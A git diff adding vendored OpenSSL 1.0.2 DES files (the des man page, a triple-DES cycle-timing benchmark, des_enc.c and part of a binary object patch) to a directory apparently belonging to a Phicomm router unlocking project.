+I<output-file>
+] ]
+
+=head1 NOTE
+
+This page describes the B<des> stand-alone program, not the B<openssl des>
+command.
+
+=head1 DESCRIPTION
+
+B<des>
+encrypts and decrypts data using the
+Data Encryption Standard algorithm.
+One of
+B<-e>, B<-E>
+(for encrypt) or
+B<-d>, B<-D>
+(for decrypt) must be specified.
+It is also possible to use
+B<-c>
+or
+B<-C>
+in conjunction or instead of the a encrypt/decrypt option to generate
+a 16 character hexadecimal checksum, generated via the
+I<des_cbc_cksum>.
+
+Two standard encryption modes are supported by the
+B<des>
+program, Cipher Block Chaining (the default) and Electronic Code Book
+(specified with
+B<-b>).
+
+The key used for the DES
+algorithm is obtained by prompting the user unless the
+B<-k>
+I<key>
+option is given.
+If the key is an argument to the
+B<des>
+command, it is potentially visible to users executing
+ps(1)
+or a derivative.  To minimise this possibility,
+B<des>
+takes care to destroy the key argument immediately upon entry.
+If your shell keeps a history file be careful to make sure it is not
+world readable.
+
+Since this program attempts to maintain compatibility with sunOS's
+des(1) command, there are 2 different methods used to convert the user
+supplied key to a des key.
+Whenever and one or more of
+B<-E>, B<-D>, B<-C>
+or
+B<-3>
+options are used, the key conversion procedure will not be compatible
+with the sunOS des(1) version but will use all the user supplied
+character to generate the des key.
+B<des>
+command reads from standard input unless
+I<input-file>
+is specified and writes to standard output unless
+I<output-file>
+is given.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-b>
+
+Select ECB
+(eight bytes at a time) encryption mode.
+
+=item B<-3>
+
+Encrypt using triple encryption.
+By default triple cbc encryption is used but if the
+B<-b>
+option is used then triple ECB encryption is performed.
+If the key is less than 8 characters long, the flag has no effect.
+
+=item B<-e>
+
+Encrypt data using an 8 byte key in a manner compatible with sunOS
+des(1).
+
+=item B<-E>
+
+Encrypt data using a key of nearly unlimited length (1024 bytes).
+This will product a more secure encryption.
+
+=item B<-d>
+
+Decrypt data that was encrypted with the B<-e> option.
+
+=item B<-D>
+
+Decrypt data that was encrypted with the B<-E> option.
+
+=item B<-c>
+
+Generate a 16 character hexadecimal cbc checksum and output this to
+stderr.
+If a filename was specified after the
+B<-c>
+option, the checksum is output to that file.
+The checksum is generated using a key generated in a sunOS compatible
+manner.
+
+=item B<-C>
+
+A cbc checksum is generated in the same manner as described for the
+B<-c>
+option but the DES key is generated in the same manner as used for the
+B<-E>
+and
+B<-D>
+options
+
+=item B<-f>
+
+Does nothing - allowed for compatibility with sunOS des(1) command.
+
+=item B<-s>
+
+Does nothing - allowed for compatibility with sunOS des(1) command.
+
+=item B<-k> I<key>
+
+Use the encryption 
+I<key>
+specified.
+
+=item B<-h>
+
+The
+I<key>
+is assumed to be a 16 character hexadecimal number.
+If the
+B<-3>
+option is used the key is assumed to be a 32 character hexadecimal
+number.
+
+=item B<-u>
+
+This flag is used to read and write uuencoded files.  If decrypting,
+the input file is assumed to contain uuencoded, DES encrypted data.
+If encrypting, the characters following the B<-u> are used as the name of
+the uuencoded file to embed in the begin line of the uuencoded
+output.  If there is no name specified after the B<-u>, the name text.des
+will be embedded in the header.
+
+=head1 SEE ALSO
+
+ps(1),
+L<des_crypt(3)|des_crypt(3)>
+
+=head1 BUGS
+
+The problem with using the
+B<-e>
+option is the short key length.
+It would be better to use a real 56-bit key rather than an
+ASCII-based 56-bit pattern.  Knowing that the key was derived from ASCII
+radically reduces the time necessary for a brute-force cryptographic attack.
+My attempt to remove this problem is to add an alternative text-key to
+DES-key function.  This alternative function (accessed via
+B<-E>, B<-D>, B<-S>
+and
+B<-3>)
+uses DES to help generate the key.
+
+Be carefully when using the B<-u> option.  Doing B<des -ud> I<filename> will
+not decrypt filename (the B<-u> option will gobble the B<-d> option).
+
+The VMS operating system operates in a world where files are always a
+multiple of 512 bytes.  This causes problems when encrypted data is
+send from Unix to VMS since a 88 byte file will suddenly be padded
+with 424 null bytes.  To get around this problem, use the B<-u> option
+to uuencode the data before it is send to the VMS system.
+
+=head1 AUTHOR
+
+Eric Young (eay@cryptsoft.com)
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des3s.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des3s.cpp
new file mode 100644
index 0000000..02d527c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des3s.cpp
@@ -0,0 +1,67 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/des.h>
+
+void main(int argc,char *argv[])
+	{
+	des_key_schedule key1,key2,key3;
+	unsigned long s1,s2,e1,e2;
+	unsigned long data[2];
+	int i,j;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<1000; i++) /**/
+			{
+			des_encrypt3(&data[0],key1,key2,key3);
+			GetTSC(s1);
+			des_encrypt3(&data[0],key1,key2,key3);
+			des_encrypt3(&data[0],key1,key2,key3);
+			des_encrypt3(&data[0],key1,key2,key3);
+			GetTSC(e1);
+			GetTSC(s2);
+			des_encrypt3(&data[0],key1,key2,key3);
+			des_encrypt3(&data[0],key1,key2,key3);
+			des_encrypt3(&data[0],key1,key2,key3);
+			des_encrypt3(&data[0],key1,key2,key3);
+			GetTSC(e2);
+			des_encrypt3(&data[0],key1,key2,key3);
+			}
+
+		printf("des %d %d (%d)\n",
+			e1-s1,e2-s2,((e2-s2)-(e1-s1)));
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_enc.c
new file mode 100644
index 0000000..c0b062d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_enc.c
@@ -0,0 +1,389 @@
+/* crypto/des/des_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+#include "spr.h"
+
+void DES_encrypt1(DES_LONG *data, DES_key_schedule *ks, int enc)
+{
+    register DES_LONG l, r, t, u;
+#ifdef DES_PTR
+    register const unsigned char *des_SP = (const unsigned char *)DES_SPtrans;
+#endif
+#ifndef DES_UNROLL
+    register int i;
+#endif
+    register DES_LONG *s;
+
+    r = data[0];
+    l = data[1];
+
+    IP(r, l);
+    /*
+     * Things have been modified so that the initial rotate is done outside
+     * the loop.  This required the DES_SPtrans values in sp.h to be rotated
+     * 1 bit to the right. One perl script later and things have a 5% speed
+     * up on a sparc2. Thanks to Richard Outerbridge
+     * <71755.204@CompuServe.COM> for pointing this out.
+     */
+    /* clear the top bits on machines with 8byte longs */
+    /* shift left by 2 */
+    r = ROTATE(r, 29) & 0xffffffffL;
+    l = ROTATE(l, 29) & 0xffffffffL;
+
+    s = ks->ks->deslong;
+    /*
+     * I don't know if it is worth the effort of loop unrolling the inner
+     * loop
+     */
+    if (enc) {
+#ifdef DES_UNROLL
+        D_ENCRYPT(l, r, 0);     /* 1 */
+        D_ENCRYPT(r, l, 2);     /* 2 */
+        D_ENCRYPT(l, r, 4);     /* 3 */
+        D_ENCRYPT(r, l, 6);     /* 4 */
+        D_ENCRYPT(l, r, 8);     /* 5 */
+        D_ENCRYPT(r, l, 10);    /* 6 */
+        D_ENCRYPT(l, r, 12);    /* 7 */
+        D_ENCRYPT(r, l, 14);    /* 8 */
+        D_ENCRYPT(l, r, 16);    /* 9 */
+        D_ENCRYPT(r, l, 18);    /* 10 */
+        D_ENCRYPT(l, r, 20);    /* 11 */
+        D_ENCRYPT(r, l, 22);    /* 12 */
+        D_ENCRYPT(l, r, 24);    /* 13 */
+        D_ENCRYPT(r, l, 26);    /* 14 */
+        D_ENCRYPT(l, r, 28);    /* 15 */
+        D_ENCRYPT(r, l, 30);    /* 16 */
+#else
+        for (i = 0; i < 32; i += 4) {
+            D_ENCRYPT(l, r, i + 0); /* 1 */
+            D_ENCRYPT(r, l, i + 2); /* 2 */
+        }
+#endif
+    } else {
+#ifdef DES_UNROLL
+        D_ENCRYPT(l, r, 30);    /* 16 */
+        D_ENCRYPT(r, l, 28);    /* 15 */
+        D_ENCRYPT(l, r, 26);    /* 14 */
+        D_ENCRYPT(r, l, 24);    /* 13 */
+        D_ENCRYPT(l, r, 22);    /* 12 */
+        D_ENCRYPT(r, l, 20);    /* 11 */
+        D_ENCRYPT(l, r, 18);    /* 10 */
+        D_ENCRYPT(r, l, 16);    /* 9 */
+        D_ENCRYPT(l, r, 14);    /* 8 */
+        D_ENCRYPT(r, l, 12);    /* 7 */
+        D_ENCRYPT(l, r, 10);    /* 6 */
+        D_ENCRYPT(r, l, 8);     /* 5 */
+        D_ENCRYPT(l, r, 6);     /* 4 */
+        D_ENCRYPT(r, l, 4);     /* 3 */
+        D_ENCRYPT(l, r, 2);     /* 2 */
+        D_ENCRYPT(r, l, 0);     /* 1 */
+#else
+        for (i = 30; i > 0; i -= 4) {
+            D_ENCRYPT(l, r, i - 0); /* 16 */
+            D_ENCRYPT(r, l, i - 2); /* 15 */
+        }
+#endif
+    }
+
+    /* rotate and clear the top bits on machines with 8byte longs */
+    l = ROTATE(l, 3) & 0xffffffffL;
+    r = ROTATE(r, 3) & 0xffffffffL;
+
+    FP(r, l);
+    data[0] = l;
+    data[1] = r;
+    l = r = t = u = 0;
+}
+
+void DES_encrypt2(DES_LONG *data, DES_key_schedule *ks, int enc)
+{
+    register DES_LONG l, r, t, u;
+#ifdef DES_PTR
+    register const unsigned char *des_SP = (const unsigned char *)DES_SPtrans;
+#endif
+#ifndef DES_UNROLL
+    register int i;
+#endif
+    register DES_LONG *s;
+
+    r = data[0];
+    l = data[1];
+
+    /*
+     * Things have been modified so that the initial rotate is done outside
+     * the loop.  This required the DES_SPtrans values in sp.h to be rotated
+     * 1 bit to the right. One perl script later and things have a 5% speed
+     * up on a sparc2. Thanks to Richard Outerbridge
+     * <71755.204@CompuServe.COM> for pointing this out.
+     */
+    /* clear the top bits on machines with 8byte longs */
+    r = ROTATE(r, 29) & 0xffffffffL;
+    l = ROTATE(l, 29) & 0xffffffffL;
+
+    s = ks->ks->deslong;
+    /*
+     * I don't know if it is worth the effort of loop unrolling the inner
+     * loop
+     */
+    if (enc) {
+#ifdef DES_UNROLL
+        D_ENCRYPT(l, r, 0);     /* 1 */
+        D_ENCRYPT(r, l, 2);     /* 2 */
+        D_ENCRYPT(l, r, 4);     /* 3 */
+        D_ENCRYPT(r, l, 6);     /* 4 */
+        D_ENCRYPT(l, r, 8);     /* 5 */
+        D_ENCRYPT(r, l, 10);    /* 6 */
+        D_ENCRYPT(l, r, 12);    /* 7 */
+        D_ENCRYPT(r, l, 14);    /* 8 */
+        D_ENCRYPT(l, r, 16);    /* 9 */
+        D_ENCRYPT(r, l, 18);    /* 10 */
+        D_ENCRYPT(l, r, 20);    /* 11 */
+        D_ENCRYPT(r, l, 22);    /* 12 */
+        D_ENCRYPT(l, r, 24);    /* 13 */
+        D_ENCRYPT(r, l, 26);    /* 14 */
+        D_ENCRYPT(l, r, 28);    /* 15 */
+        D_ENCRYPT(r, l, 30);    /* 16 */
+#else
+        for (i = 0; i < 32; i += 4) {
+            D_ENCRYPT(l, r, i + 0); /* 1 */
+            D_ENCRYPT(r, l, i + 2); /* 2 */
+        }
+#endif
+    } else {
+#ifdef DES_UNROLL
+        D_ENCRYPT(l, r, 30);    /* 16 */
+        D_ENCRYPT(r, l, 28);    /* 15 */
+        D_ENCRYPT(l, r, 26);    /* 14 */
+        D_ENCRYPT(r, l, 24);    /* 13 */
+        D_ENCRYPT(l, r, 22);    /* 12 */
+        D_ENCRYPT(r, l, 20);    /* 11 */
+        D_ENCRYPT(l, r, 18);    /* 10 */
+        D_ENCRYPT(r, l, 16);    /* 9 */
+        D_ENCRYPT(l, r, 14);    /* 8 */
+        D_ENCRYPT(r, l, 12);    /* 7 */
+        D_ENCRYPT(l, r, 10);    /* 6 */
+        D_ENCRYPT(r, l, 8);     /* 5 */
+        D_ENCRYPT(l, r, 6);     /* 4 */
+        D_ENCRYPT(r, l, 4);     /* 3 */
+        D_ENCRYPT(l, r, 2);     /* 2 */
+        D_ENCRYPT(r, l, 0);     /* 1 */
+#else
+        for (i = 30; i > 0; i -= 4) {
+            D_ENCRYPT(l, r, i - 0); /* 16 */
+            D_ENCRYPT(r, l, i - 2); /* 15 */
+        }
+#endif
+    }
+    /* rotate and clear the top bits on machines with 8byte longs */
+    data[0] = ROTATE(l, 3) & 0xffffffffL;
+    data[1] = ROTATE(r, 3) & 0xffffffffL;
+    l = r = t = u = 0;
+}
+
+void DES_encrypt3(DES_LONG *data, DES_key_schedule *ks1,
+                  DES_key_schedule *ks2, DES_key_schedule *ks3)
+{
+    register DES_LONG l, r;
+
+    l = data[0];
+    r = data[1];
+    IP(l, r);
+    data[0] = l;
+    data[1] = r;
+    DES_encrypt2((DES_LONG *)data, ks1, DES_ENCRYPT);
+    DES_encrypt2((DES_LONG *)data, ks2, DES_DECRYPT);
+    DES_encrypt2((DES_LONG *)data, ks3, DES_ENCRYPT);
+    l = data[0];
+    r = data[1];
+    FP(r, l);
+    data[0] = l;
+    data[1] = r;
+}
+
+void DES_decrypt3(DES_LONG *data, DES_key_schedule *ks1,
+                  DES_key_schedule *ks2, DES_key_schedule *ks3)
+{
+    register DES_LONG l, r;
+
+    l = data[0];
+    r = data[1];
+    IP(l, r);
+    data[0] = l;
+    data[1] = r;
+    DES_encrypt2((DES_LONG *)data, ks3, DES_DECRYPT);
+    DES_encrypt2((DES_LONG *)data, ks2, DES_ENCRYPT);
+    DES_encrypt2((DES_LONG *)data, ks1, DES_DECRYPT);
+    l = data[0];
+    r = data[1];
+    FP(r, l);
+    data[0] = l;
+    data[1] = r;
+}
+
+#ifndef DES_DEFAULT_OPTIONS
+
+# undef CBC_ENC_C__DONT_UPDATE_IV
+# include "ncbc_enc.c"          /* DES_ncbc_encrypt */
+
+void DES_ede3_cbc_encrypt(const unsigned char *input, unsigned char *output,
+                          long length, DES_key_schedule *ks1,
+                          DES_key_schedule *ks2, DES_key_schedule *ks3,
+                          DES_cblock *ivec, int enc)
+{
+    register DES_LONG tin0, tin1;
+    register DES_LONG tout0, tout1, xor0, xor1;
+    register const unsigned char *in;
+    unsigned char *out;
+    register long l = length;
+    DES_LONG tin[2];
+    unsigned char *iv;
+
+    in = input;
+    out = output;
+    iv = &(*ivec)[0];
+
+    if (enc) {
+        c2l(iv, tout0);
+        c2l(iv, tout1);
+        for (l -= 8; l >= 0; l -= 8) {
+            c2l(in, tin0);
+            c2l(in, tin1);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+
+            tin[0] = tin0;
+            tin[1] = tin1;
+            DES_encrypt3((DES_LONG *)tin, ks1, ks2, ks3);
+            tout0 = tin[0];
+            tout1 = tin[1];
+
+            l2c(tout0, out);
+            l2c(tout1, out);
+        }
+        if (l != -8) {
+            c2ln(in, tin0, tin1, l + 8);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+
+            tin[0] = tin0;
+            tin[1] = tin1;
+            DES_encrypt3((DES_LONG *)tin, ks1, ks2, ks3);
+            tout0 = tin[0];
+            tout1 = tin[1];
+
+            l2c(tout0, out);
+            l2c(tout1, out);
+        }
+        iv = &(*ivec)[0];
+        l2c(tout0, iv);
+        l2c(tout1, iv);
+    } else {
+        register DES_LONG t0, t1;
+
+        c2l(iv, xor0);
+        c2l(iv, xor1);
+        for (l -= 8; l >= 0; l -= 8) {
+            c2l(in, tin0);
+            c2l(in, tin1);
+
+            t0 = tin0;
+            t1 = tin1;
+
+            tin[0] = tin0;
+            tin[1] = tin1;
+            DES_decrypt3((DES_LONG *)tin, ks1, ks2, ks3);
+            tout0 = tin[0];
+            tout1 = tin[1];
+
+            tout0 ^= xor0;
+            tout1 ^= xor1;
+            l2c(tout0, out);
+            l2c(tout1, out);
+            xor0 = t0;
+            xor1 = t1;
+        }
+        if (l != -8) {
+            c2l(in, tin0);
+            c2l(in, tin1);
+
+            t0 = tin0;
+            t1 = tin1;
+
+            tin[0] = tin0;
+            tin[1] = tin1;
+            DES_decrypt3((DES_LONG *)tin, ks1, ks2, ks3);
+            tout0 = tin[0];
+            tout1 = tin[1];
+
+            tout0 ^= xor0;
+            tout1 ^= xor1;
+            l2cn(tout0, tout1, out, l + 8);
+            xor0 = t0;
+            xor1 = t1;
+        }
+
+        iv = &(*ivec)[0];
+        l2c(xor0, iv);
+        l2c(xor1, iv);
+    }
+    tin0 = tin1 = tout0 = tout1 = xor0 = xor1 = 0;
+    tin[0] = tin[1] = 0;
+}
+
+#endif                          /* DES_DEFAULT_OPTIONS */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..da6cc5743552c94e47f95c7df46ec4241ce9d25e
GIT binary patch
literal 18272
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
